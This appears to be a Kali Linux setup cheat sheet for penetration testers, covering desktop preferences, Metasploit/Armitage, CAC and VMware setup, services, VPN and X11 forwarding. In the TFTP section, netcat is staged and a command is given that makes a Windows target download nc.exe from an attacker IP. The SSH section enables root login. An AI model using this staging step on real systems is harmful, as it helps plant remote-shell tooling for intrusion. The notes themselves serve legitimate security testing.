Kali


# Terminal

Edit > Profile Preferences
Colors: Uncheck Use transparent background
------------------------------------------------------------------------------------------------------

# Disable screen lock

Top right icon > tools icon > Power
Power Saving > Blank screen: Never
Back arrow
Privacy > Screen Lock > Automatic Screen Lock: Off
------------------------------------------------------------------------------------------------------

# gedit

Preferences
View: Display line numbers, Highlight current line
Editor: Tab width 5, Insert spaces instead of tabs
Color Scheme: Oblivion
------------------------------------------------------------------------------------------------------

# Setup Armitage

msfdb init	      Initialize the database
armitage

# Check Metasploit

msfconsole
db_status             Look for: postgresql connected to msf
------------------------------------------------------------------------------------------------------

# Install Discover scripts

git clone https://github.com/leebaird/discover /opt/discover/
cd /opt/discover/
./update.sh
------------------------------------------------------------------------------------------------------

# Install CAC Reader (if needed)

Notes                 https://help.ubuntu.com/community/CommonAccessCard

Packages              apt-get install libpcsclite1 pcscd pcsc-tools
DoD certificates      dodpki.c3pki.chamb.disa.mil/rootca.html
CACKey                https://docs.google.com/file/d/0B8JoV2w_9hicRGQ0TFQ5UEpwSkE/edit?pli=1

Attach CAC reader, insert CAC and verify Kali can read it.
pcsc_scan

Iceweasel > Edit > Preferences > Advanced > Security Devices > Load
     Module Name: CAC
     Browse > /usr/lib64/libcackey.so > Open > OK
     You should now see your device listed on the left > OK

Firefox extension     www.forge.mil/Resources-Firefox.html
------------------------------------------------------------------------------------------------------

# Install VMware Tools (if needed)

VMware > Virtual Machine > Install VMware Tools > Install
cp /media/cdrom/VMwareTools-<version>.tar.gz /root/
cd /root/
tar zxvf VMwareTools-<version>.tar.gz 
cd vmware-tools-distrib/
./vmware-install.pl 
Accept all the defaults until:
   The path "/" is not a valid path to the .....-amd64 kernel headers.
   Would you like to change it?  No
reboot
------------------------------------------------------------------------------------------------------

# Services

# Apache
service apache2 start                            Start apache
netstat -antp | grep apache                      Verify the service is running
/var/www/index.html                              Default home page
/var/log/apache2/access.log                      Logs

# Postgresql
service postgresql start                         Start postgreSQL
netstat -antp | grep postgres                    Verify the service is running
service metasploit start                         Start Metasploit
msfconsole                                       Launch Metasploit console
db_status                                        Verifty database connectivity
update-rc.d postgresql enable                    Enable postgreSQL to start at boot time
update-rc.d metasploit enable                    Enable Metasploit to start at boot time

# SSH
ssh-keygen                                       Setup new keys
/etc/ssh/sshd_config                             Config file
Port 2222                                        Change port to run service
PermitRootLogin yes                              Allow root login
service ssh start                                Start ssh
netstat -antp | grep ssh                         Verify the service is running
update-rc.d ssh enable                           Enable ssh to start at boot time
update-rc.d ssh disable                          Disable ssh from starting at boot time
ssh root@targetIP                                SSH to server on standard port
ssh root@targetIP -p 2222                        SSH to server on non-stardard port (2222)

# TFTP
mkdir /tftp                                      Create a new home folder for tftp
atftpd --daemon --port 69 /tftp                  Start tftp and assign home folder
netstat -anup | grep atftp                       Verify the service is running
cp /usr/share/windows-binaries/nc.exe /tftp/
tftp -i <attacker IP> get nc.exe                 Run from Windows

# GUI
rcconf                                           GUI for managing all startup services 
------------------------------------------------------------------------------------------------------

# VPN

apt-get install network-manager-iodine network-manager-iodine-gnome
apt-get install network-manager-openconnect network-manager-openconnect-gnome
apt-get install network-manager-openvpn network-manager-openvpn-gnome
apt-get install network-manager-pptp network-manager-pptp-gnome
apt-get install network-manager-strongswan
apt-get install network-manager-vpnc network-manager-vpnc-gnome
/etc/init.d/network-manager restart

# Thanks to Robert Clowser for the bug fix!
nano /etc/network/interfaces
Remove the last two lines egarding eth0. 
Reboot
------------------------------------------------------------------------------------------------------

# X11

nano /etc/ssh/ssh_config
Uncomment ForwardX11, change to yes
Uncomment ForwardX11Trusted

service ssh restart

OS X
  ssh -X root@<targetIP>
  Start app that requires a GUI.
  iceweasel &
